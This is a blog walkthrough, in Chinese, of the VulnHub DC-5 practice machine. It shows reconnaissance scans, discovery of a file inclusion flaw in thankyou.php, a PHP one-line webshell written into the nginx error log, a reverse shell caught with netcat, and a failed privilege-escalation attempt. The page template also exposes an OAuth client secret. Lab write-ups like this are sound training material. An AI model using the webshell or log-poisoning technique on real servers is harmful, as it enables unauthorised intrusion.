<!DOCTYPE html><html lang="zh-cn" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>[vulnhub]  DC:5 | Terminal-001 | T3yT3y</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.woff2"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><script>var config = {"root":"/","code_fold":15,"search":{"preload":false,"activeHolder":"键入以继续","blurHolder":"数据检索","noResult":"无 $0 相关数据"},"code":{"codeInfo":"$0 - $1 行","copy":"复制"}}</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="/js/gitalk.js"></script><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: '确认'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script async src="/js/gitalk.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {gitalk = new Gitalk({
 clientID: 'd746fee266fd40784c87',
 clientSecret: '4aa78f02c6c9e3e5ffb7ca2c6414a5a2834a7bc0',
 repo: 'T3yT3y.github.io',
 owner: 'T3yT3y',
 admin: ['T3yT3y'],
 distractionFreeMode: false,
 id: location.pathname
});
if (document.querySelector("#gitalk")) gitalk.render("gitalk");document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.busuanzi'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);document.addEventListener('pjax:success', _ => bszCaller.fetch(
 "//busuanzi.ibruce.info/busuanzi?jsonpCallback=BusuanziCallback", a => {
  bszTag.texts(a),
  bszTag.shows()
}));reset()})</script><script class="pjax-js">reset= () => {gitalk = new Gitalk({
 clientID: 'd746fee266fd40784c87',
 clientSecret: '4aa78f02c6c9e3e5ffb7ca2c6414a5a2834a7bc0',
 repo: 'T3yT3y.github.io',
 owner: 'T3yT3y',
 admin: ['T3yT3y'],
 distractionFreeMode: false,
 id: location.pathname
});
if (document.querySelector("#gitalk")) gitalk.render("gitalk");document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="数据检索" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/about/"><span class="navItemTitle">About</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>[vulnhub]  DC:5</h1><div id="post-info"><span>文章发布时间: <div class="control"><time datetime="2023-06-02T16:00:00.000Z" id="date"> 2023-06-03</time></div></span><br><span>最后更新时间: <div class="control"><time datetime="2025-04-22T15:29:50.544Z" id="updated"> 2025-04-22</time></div></span><br><span>文章总字数: <div class="control">2.1k</div></span><br><span>预计阅读时间: <div class="control">10 分钟</div></span><br><span id="busuanzi_container_page_pv">页面浏览: <span class="control" id="busuanzi_value_page_pv">加载中...</span></span></div></div><hr><div id="post-content"><p class='item-img' data-src='/pic/5cf04a9ee1d4f70c20efa851896c1d440ef07f8f4a6a512376030817ec0bb6fb.jpg'><img src="/pic/5cf04a9ee1d4f70c20efa851896c1d440ef07f8f4a6a512376030817ec0bb6fb.jpg" alt="5cf04a9ee1d4f70c20efa851896c1d440ef07f8f4a6a512376030817ec0bb6fb"></p>
<span id="more"></span>

<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>DC-5，开始上难度了，主要考对文件包含的理解，考在发现文件包含漏洞的存在后，该查看哪些信息，如何利用文件包含get shell。提权部分和解了。</p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>Port Scan:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs bash">Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 20:37 CST<br>Warning: 192.168.56.114 giving up on port because retransmission <span class="hljs-built_in">cap</span> hit (10).<br>Nmap scan report <span class="hljs-keyword">for</span> 192.168.56.114<br>Host is up (0.00050s latency).<br>Not shown: 37405 filtered tcp ports (no-response), 28127 closed tcp ports (reset)<br>PORT      STATE SERVICE<br>80/tcp    open  http<br>111/tcp   open  rpcbind<br>49405/tcp open  unknown<br>MAC Address: 08:00:27:70:CC:B2 (Oracle VirtualBox virtual NIC)<br><br>Nmap <span class="hljs-keyword">done</span>: 1 IP address (1 host up) scanned <span class="hljs-keyword">in</span> 116.67 seconds<br></code></pre></td></tr></table></figure>


<p>TCP, Service, OS Scan:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs bash">Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 20:39 CST<br>Nmap scan report <span class="hljs-keyword">for</span> 192.168.56.114<br>Host is up (0.00093s latency).<br><br>PORT      STATE SERVICE VERSION<br>80/tcp    open  http    nginx 1.6.2<br>111/tcp   open  rpcbind 2-4 (RPC <span class="hljs-comment">#100000)</span><br>49405/tcp open  status  1 (RPC <span class="hljs-comment">#100024)</span><br>MAC Address: 08:00:27:70:CC:B2 (Oracle VirtualBox virtual NIC)<br>Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port<br>Device <span class="hljs-built_in">type</span>: general purpose<br>Running: Linux 3.X|4.X<br>OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4<br>OS details: Linux 3.2 - 4.9<br>Network Distance: 1 hop<br><br>OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .<br>Nmap <span class="hljs-keyword">done</span>: 1 IP address (1 host up) scanned <span class="hljs-keyword">in</span> 14.06 seconds<br></code></pre></td></tr></table></figure>


<p>UDP Scan:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs bash">Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 20:39 CST<br>Warning: 192.168.56.114 giving up on port because retransmission <span class="hljs-built_in">cap</span> hit (10).<br>Nmap scan report <span class="hljs-keyword">for</span> 192.168.56.114<br>Host is up (0.0016s latency).<br>Not shown: 65458 open|filtered udp ports (no-response), 75 closed udp ports (port-unreach)<br>PORT      STATE SERVICE<br>111/udp   open  rpcbind<br>40520/udp open  unknown<br>MAC Address: 08:00:27:70:CC:B2 (Oracle VirtualBox virtual NIC)<br><br>Nmap <span class="hljs-keyword">done</span>: 1 IP address (1 host up) scanned <span class="hljs-keyword">in</span> 72.85 seconds<br></code></pre></td></tr></table></figure>


<p>Simple Vuln Scan:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs bash">Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 20:40 CST<br>Nmap scan report <span class="hljs-keyword">for</span> 192.168.56.114<br>Host is up (0.00022s latency).<br>Not shown: 998 closed tcp ports (reset)<br>PORT    STATE SERVICE<br>80/tcp  open  http<br>|_http-stored-xss: Couldn<span class="hljs-string">&#x27;t find any stored XSS vulnerabilities.</span><br><span class="hljs-string">|_http-dombased-xss: Couldn&#x27;</span>t find any DOM based XSS.<br>| http-csrf: <br>| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.114<br>|   Found the following possible CSRF vulnerabilities: <br>|     <br>|     Path: http://192.168.56.114:80/contact.php<br>|     Form <span class="hljs-built_in">id</span>: fname<br>|_    Form action: thankyou.php<br>111/tcp open  rpcbind<br>MAC Address: 08:00:27:70:CC:B2 (Oracle VirtualBox virtual NIC)<br><br>Nmap <span class="hljs-keyword">done</span>: 1 IP address (1 host up) scanned <span class="hljs-keyword">in</span> 74.57 seconds<br></code></pre></td></tr></table></figure>


<p>nikto Vuln Scan:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs bash">- Nikto v2.5.0<br>---------------------------------------------------------------------------<br>+ Target IP:          192.168.56.114<br>+ Target Hostname:    192.168.56.114<br>+ Target Port:        80<br>+ Start Time:         2023-06-02 20:41:49 (GMT8)<br>---------------------------------------------------------------------------<br>+ Server: nginx/1.6.2<br>+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options<br>+ /: The X-Content-Type-Options header is not <span class="hljs-built_in">set</span>. This could allow the user agent to render the content of the site <span class="hljs-keyword">in</span> a different fashion to the MIME <span class="hljs-built_in">type</span>. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/<br>+ No CGI Directories found (use <span class="hljs-string">&#x27;-C all&#x27;</span> to force check all possible <span class="hljs-built_in">dirs</span>)<br>+ /#wp-config.php#: <span class="hljs-comment">#wp-config.php# file found. This file contains the credentials.</span><br>+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host<br>+ End Time:           2023-06-02 20:42:12 (GMT8) (23 seconds)<br>---------------------------------------------------------------------------<br>+ 1 host(s) tested<br></code></pre></td></tr></table></figure>


<p>web fingerprint Scan:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://192.168.56.114 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.6.2], IP[192.168.56.114], Title[Welcome], nginx[1.6.2]<br></code></pre></td></tr></table></figure>


<p>Simple Web content discovery:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs bash"><br>-----------------<br>DIRB v2.22    <br>By The Dark Raver<br>-----------------<br><br>START_TIME: Fri Jun  2 20:42:19 2023<br>URL_BASE: http://192.168.56.114/<br>WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt<br><br>-----------------<br><br>GENERATED WORDS: 4612                                                          <br><br>---- Scanning URL: http://192.168.56.114/ ----<br>==&gt; DIRECTORY: http://192.168.56.114/css/                                                                                                                                                  <br>==&gt; DIRECTORY: http://192.168.56.114/images/                                                                                                                                               <br>+ http://192.168.56.114/index.php (CODE:200|SIZE:4025)                                                         <br>---- Entering directory: http://192.168.56.114/css/ ----<br>                                  <br>---- Entering directory: http://192.168.56.114/images/ ----<br>                                  <br>-----------------<br>END_TIME: Fri Jun  2 20:42:25 2023<br>DOWNLOADED: 13836 - FOUND: 1<br><br></code></pre></td></tr></table></figure>

<p>dirb没啥信息就用feroxbuster再扫一下。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~/vulnhub/DC/5/workSpace]<br>└─$ <span class="hljs-built_in">sudo</span> feroxbuster -u http://192.168.56.114 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,301,302,401,403                    <br><br> ___  ___  __   __     __      __         __   ___<br>|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__<br>|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___<br>by Ben <span class="hljs-string">&quot;epi&quot;</span> Risher 🤓                 ver: 2.10.0<br>───────────────────────────┬──────────────────────<br> 🎯  Target Url            │ http://192.168.56.114<br> 🚀  Threads               │ 50<br> 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt<br> 👌  Status Codes          │ [200, 301, 302, 401, 403]<br> 💥  Timeout (secs)        │ 7<br> 🦡  User-Agent            │ feroxbuster/2.10.0<br> 💉  Config File           │ /etc/feroxbuster/ferox-config.toml<br> 🔎  Extract Links         │ <span class="hljs-literal">true</span><br> 🏁  HTTP methods          │ [GET]<br> 🔃  Recursion Depth       │ 4<br>───────────────────────────┴──────────────────────<br> 🏁  Press [ENTER] to use the Scan Management Menu™<br>──────────────────────────────────────────────────<br>301      GET        7l       12w      184c http://192.168.56.114/images =&gt; http://192.168.56.114/images/<br>200      GET      145l      343w     2638c http://192.168.56.114/css/styles.css<br>200      GET       54l      560w     4292c http://192.168.56.114/about-us.php<br>200      GET       52l      525w     4100c http://192.168.56.114/solutions.php<br>200      GET       58l      752w     5645c http://192.168.56.114/faq.php<br>200      GET       54l      525w     4025c http://192.168.56.114/index.php<br>200      GET       72l      479w     4282c http://192.168.56.114/contact.php<br>200      GET       54l      525w     4025c http://192.168.56.114/<br>403      GET        7l       10w      168c http://192.168.56.114/css/<br>301      GET        7l       12w      184c http://192.168.56.114/css =&gt; http://192.168.56.114/css/<br></code></pre></td></tr></table></figure>

<p>总计一下，最终扫出来的有用信息就是80端口跑着nginx服务搭的网站。</p>
<p>且目录扫描也没有太多的收获。只能死怼网站了。</p>
<h2 id="web渗透"><a href="#web渗透" class="headerlink" title="web渗透"></a>web渗透</h2><h3 id="查看网页"><a href="#查看网页" class="headerlink" title="查看网页"></a>查看网页</h3><p>前几个页面来回看也没有什么信息。contact页面的输入框尝试加单引号<code>&#39;</code>测试SQL注入也没有什么结果。但是在来回测试其他可能的sql注入的可能时，发现thankyou.php底下的footer的年份在变化。</p>
<p class='item-img' data-src='/pic/assets/dc5-contact-1.png'><img src="/pic/assets/dc5-contact-1.png" alt="dc5-contact-1"></p>
<p class='item-img' data-src='/pic/assets/dc-5-contact-2.png'><img src="/pic/assets/dc-5-contact-2.png" alt="dc-5-contact-2"></p>
<p>这东西为啥会变，很奇怪。F12打开控制台发现footer部分是一个footer-warper。</p>
<p class='item-img' data-src='/pic/assets/dc-5-footer-wrapper.png'><img src="/pic/assets/dc-5-footer-wrapper.png" alt="dc-5-footer-wrapper"></p>
<p>结合之前目录扫描发现的footer.php页面，我们打开footer.php页面刷新几次，发现其值确实是在变化。</p>
<p class='item-img' data-src='/pic/assets/dc-5-footer.png'><img src="/pic/assets/dc-5-footer.png" alt="dc-5-footer"></p>
<p>这以上信息说明了什么呢？说明了thankyou.php底下肯定include了footer.php。但是，他到底什么怎么include的，是写死的还是传参的我们不得而知。因此，我们可以尝试fuzz一下，毕竟没路了，只能试试这个了。就当他是接受参数包含进去的。</p>
<h3 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h3><p>我们要fuzz两个参数：一个是接收的参数，一个是文件位置。</p>
<p class='item-img' data-src='/pic/assets/dc5-bp-1.png'><img src="/pic/assets/dc5-bp-1.png" alt="dc5-bp-1"></p>
<p>我们直接用burpsuite里的intruder进行fuzz。用intruder有个好处在于它里面内置了参数以及文件遍历的字典，我们直接选pitchfork模式开始用就行。字典一变量我选的是<code>Server-side variable names</code>,字典二位置直接选<code>Fuzzing - path travesal (single file)</code>就可以。</p>
<p class='item-img' data-src='/pic/assets/dc5-bp-2.png'><img src="/pic/assets/dc5-bp-2.png" alt="dc5-bp-2"></p>
<p>我们发现其确实是用的<code>file</code>接受参数。</p>
<p>那我们手动验证一下：<br class='item-img' data-src='/pic/assets/dc5-lfi-manual.png'><img src="/pic/assets/dc5-lfi-manual.png" alt="dc5-lfi-manual"></p>
<p>发现非常OK。</p>
<p>然而，现在还有一个重大问题就是没有文件上传的地方。那我们如何拿shell？</p>
<p>上网查了下，发现nginx存在文件包含时可以尝试往错误日志以及访问日志写入一句话木马然后用蚁剑连接。然而，问题又来了，我们怎么知道这些日志在哪，虽然一般来说确实是在<code>/var/log</code>下,但是也可能放在其他地方。我们用字典枚举一下可能的地方吧，一样用的是burpsuite，不过这次用sniper模式即可，字典选<code>Local files - Linux</code>。</p>
<p class='item-img' data-src='/pic/assets/dc5-errorlog.png'><img src="/pic/assets/dc5-errorlog.png" alt="dc5-errorlog"></p>
<p>位置发现，确实是在<code>/var/log/nginx/error.log</code>。那我们接下来就是构造payload写入错误日志中了。</p>
<h3 id="get-shell"><a href="#get-shell" class="headerlink" title="get shell"></a>get shell</h3><p>我们直接简单粗暴构造一条:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://192.168.56.114/thankyou.php?file=&lt;?php @<span class="hljs-built_in">eval</span>(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&quot;shell&quot;</span>]); ?&gt;<br></code></pre></td></tr></table></figure>

<p>直接以一句话木马作为文件名，显然包含不到，因此就会写入到错误日志中。</p>
<p>验证一下：</p>
<p class='item-img' data-src='/pic/assets/dc5-errorlog-cat.png'><img src="/pic/assets/dc5-errorlog-cat.png" alt="dc5-errorlog-cat"></p>
<p>发现确实写入了。</p>
<p>蚁剑连一下。</p>
<p class='item-img' data-src='/pic/assets/dc-5-antsword.png'><img src="/pic/assets/dc-5-antsword.png" alt="dc-5-antsword"></p>
<p>成功连接，直接向&#x2F;tmp写入一个反弹shell，然后文件包含请求一下就拿到反弹shell了。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs bash">┌──(kali㉿kali)-[~]<br>└─$ <span class="hljs-built_in">sudo</span> nc -lvp 443                   <br>[<span class="hljs-built_in">sudo</span>] password <span class="hljs-keyword">for</span> kali: <br>listening on [any] 443 ...<br>192.168.56.114: inverse host lookup failed: Unknown host<br>connect to [192.168.56.144] from (UNKNOWN) [192.168.56.114] 53100<br>bash: cannot <span class="hljs-built_in">set</span> terminal process group (482): Inappropriate ioctl <span class="hljs-keyword">for</span> device<br>bash: no job control <span class="hljs-keyword">in</span> this shell<br>www-data@dc-5:~/html$<br></code></pre></td></tr></table></figure>

<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>上来先<code>sudo -l</code>,没tty，python import一下，再次sudo发现没密码。行吧。</p>
<p>看看set suid 的bin。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs bash">www-data@dc-5:/etc$ find / -<span class="hljs-built_in">type</span> f -perm -u=s 2&gt;/dev/null<br>find / -<span class="hljs-built_in">type</span> f -perm -u=s 2&gt;/dev/null<br>/bin/su<br>/bin/mount<br>/bin/umount<br>/bin/screen-4.5.0<br>/usr/bin/gpasswd<br>/usr/bin/procmail<br>/usr/bin/at<br>/usr/bin/passwd<br>/usr/bin/chfn<br>/usr/bin/newgrp<br>/usr/bin/chsh<br>/usr/lib/openssh/ssh-keysign<br>/usr/lib/dbus-1.0/dbus-daemon-launch-helper<br>/usr/lib/eject/dmcrypt-get-device<br>/usr/sbin/exim4<br>/sbin/mount.nfs<br></code></pre></td></tr></table></figure>

<p>我们在gtfobins查了一下，发现<code>screen-4.5.0</code>可以利用用于写文件。</p>
<p>然而尝试之后并没能成功利用，各种写入失败。那就找找其他的利用方式，在searchsploit搜了一下发现还真有exp。</p>
<p>下载下来运行失败了。查了一下网上，说是拆成三个文件然后本地编译完再传到靶机。</p>
<p>尝试一下发现内核版本差别太大导致靶机上运行会缺少库。然而在靶机上编译也会缺少库。搞了好久也没发现比较好的解决方案。</p>
<p>总之提权的思路和路径都是没错的，最后一步就当提权成功了。和解了。</p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2023/06/04/Year-of-the-Jellyfish/">← 下一篇 [THM]  Year of the Jellyfish</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2023/06/03/DC-6/">[vulnhub]  DC:6 上一篇 →</a></div></div></div><div id="comments"><div id="gitalk"></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="回到顶部" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="文章目录">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="切换主题"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo" style="margin:0;border-radius:0;"></a><h1 id="Dr"><a href="/"></a></h1><div id="description"><p></p></div></div><div id="aside-block"><div id="toc-div"><h1>目录</h1><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">2.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web%E6%B8%97%E9%80%8F"><span class="toc-number">3.</span> <span class="toc-text">web渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8B%E7%BD%91%E9%A1%B5"><span class="toc-number">3.1.</span> <span class="toc-text">查看网页</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">3.2.</span> <span class="toc-text">文件包含</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#get-shell"><span class="toc-number">3.3.</span> <span class="toc-text">get shell</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">4.</span> <span class="toc-text">提权</span></a></li></ol></div></div><footer><nobr>构建自 <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> 使用主题 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> 主题作者 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas><script defer src="&lt;"></script><script defer src="s"></script><script defer src="c"></script><script defer src="r"></script><script defer src="i"></script><script defer src="p"></script><script defer src="t"></script><script defer src=" "></script><script defer src="a"></script><script defer src="s"></script><script defer src="y"></script><script defer src="n"></script><script defer src="c"></script><script defer src=" "></script><script defer src="s"></script><script defer src="r"></script><script defer src="c"></script><script defer src="="></script><script defer src="&quot;"></script><script defer src="/"></script><script defer src="/"></script><script defer src="b"></script><script defer src="u"></script><script defer src="s"></script><script defer src="u"></script><script defer src="a"></script><script defer src="n"></script><script defer src="z"></script><script defer src="i"></script><script defer src="."></script><script defer src="i"></script><script defer src="b"></script><script defer src="r"></script><script defer src="u"></script><script defer src="c"></script><script defer src="e"></script><script defer src="."></script><script defer src="i"></script><script defer src="n"></script><script defer src="f"></script><script defer src="o"></script><script defer src="/"></script><script defer src="b"></script><script defer src="u"></script><script defer src="s"></script><script defer src="u"></script><script defer src="a"></script><script defer src="n"></script><script defer src="z"></script><script defer src="i"></script><script defer src="/"></script><script defer src="2"></script><script defer src="."></script><script defer src="3"></script><script defer src="/"></script><script defer src="b"></script><script defer src="u"></script><script defer src="s"></script><script defer src="u"></script><script defer src="a"></script><script defer src="n"></script><script defer src="z"></script><script defer src="i"></script><script defer src="."></script><script defer src="p"></script><script defer src="u"></script><script defer src="r"></script><script defer src="e"></script><script defer src="."></script><script defer src="m"></script><script defer src="i"></script><script defer src="n"></script><script defer src="i"></script><script defer src="."></script><script defer src="j"></script><script defer src="s"></script><script defer 